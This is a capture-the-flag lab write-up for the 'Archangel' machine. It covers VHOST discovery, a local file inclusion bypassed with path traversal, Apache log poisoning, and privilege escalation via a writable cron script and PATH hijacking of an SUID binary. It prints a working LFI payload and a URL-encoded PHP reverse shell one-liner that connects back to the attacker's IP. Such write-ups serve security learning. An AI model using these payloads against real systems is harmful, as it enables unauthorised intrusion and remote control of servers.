Archangel

Target IP: 10.10.159.156
New IP after reverting: 10.10.83.159

A well known security solutions company seems to be doing some testing on their live machine. Best time to exploit it.


Reconnaissance

8ae65d307308820b3a21b3eac7b7fab5.png
There are two TCP ports open on the target machine: SSH and HTTP. I will start enumeration with the HTTP application on port 80.


Enumeration

Port 80: HTTP

001718c652d44aec360405bbe475a630.png
The webpage above is displayed for this web application. I did not find anything useful when viewing the source-code of the webpage. The email support@mafialive.thm is interesting. Is mafialive.thm a VHOST? Adding this to the /etc/hosts file shows true.

f498c1a821c448c3adf2f257abd54b52.png
Now browsing to http://mafialive.thm displays the webpage above.

b7e7c33a03a87afdd4d6afe890b48d1e.png
Doing a directory search against this host with the command gobuster dir -u http://mafialive.thm/ -w /usr/share/wordlists/dirb/big.txt -x php,html,txt shows the entries above. The test.php sounds interesting.

397edc4693565d1958feb3c016c5f13c.png
Browsing to this test.php displays the webpage above.

0b8497432a30fb3802e1728e38b4289a.png
Pressing the button Here is a button displays the message above. A new URL parameter called view gets appended too.

878d2a3313ac75c8b64c15d05b6ac80c.png
I used ffuf to perform LFI fuzzing, but I did not find anything useful. However, I managed to read the source code of mrrobot.php using PHP filter. I should be able to read the test.php using this PHP filter.

77a1b8e6bd2e7fdff36bce5e868e1d94.png
And bingo! Using the payload http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php, I obtained the source-code of test.php in base64. Time to decode this.

e23a4bfd15eea5b7972a24261a5bbbe9.png
And decoding the base64 string source-code of test.php shows the content above. There are two conditions set:

  1. The user input should not contain ../../
  2. The user input must contain /var/www/html/development_testing

d52663b8a9f8cdb3745a7f2ca88c2dc4.png
Time to create a payload to bypass this filtering in place. Using the payload http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log, I now have access to the access.log file for poisoning. I had to revert this machine as I tried poisoning this file and it did not work. The new IP for this machine is 10.10.83.159.

3486941843dbcc2656cf707ac03abed7.png
I poisoned the access.log file with the payload highlighted in the image above.

612898e0b0ca7120a13890128858f9dd.png
And success! Sending the commands id;whoami;ls returned the output above. Time to obtain a reverse shell connection.


Exploitation

2592aed346f0a5fb03bdd86dea3de9b5.png
Since the target machine is using PHP, I sent a PHP reverse shell script to obtain a reverse shell connection. I deployed the payload php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27 and recevied a reverse shell connection on my machine on port 8443. Now I have a foothold on the target machine.


Privilege Escalation

e6b791f9b001eac6174226787e86d49d.png
Running the command find / -writable -type f 2>/dev/null shows the interesting entry /opt/helloworld.sh, as shown above.

9c4545325113a754a34c789e0a007cb2.png
And there is an interesting cronjob task with the name /opt/helloworld.sh that is executed as archangel. I have write privileges over it.

6652412eeecda744a6322b062db15a1c.png
I put my bash reverse shell script inside helloworld.sh. Then I received a reverse shell connection with the session as archangel on my machine on port 8444. I successfully elevated my privileges horizontally as www-data to archangel.

52db41f8a2984fb5157a139181da7ed8.png
The binary backup at /home/archangel/secret has SUID bit set, and the user archangel can execute it.

fdfb01e16279ea79d89727bbb4041b02.png
And running strings on this binary shows the interesting code above. It is copying the contents of home/user/archangel/myfiles/* to /opt/backupfiles. But the copy binary is used without absolute path, so I can create a malicious version of it.

88fc82829ba857eb5b87b5af450b4bac.png
I created a malicious version of the copy binary at tmp that invokes a reverse shell connection to my machine on port 8445. Then executing this binary backup, I received a root reverse shell connection on port 8445. Now I have root access.


Flags

17c2c91c87455a07c5ff8e4e1a609b8a.png
The user.txt flag which is located at archangel home directory.

c3e8623086764eb4c72b982be95bdb6e.png
The user2.txt flag after gaining access to the target machine as archangel.

b2322294245f9e313a1f03b114c33dd8.png
The root.txt flag.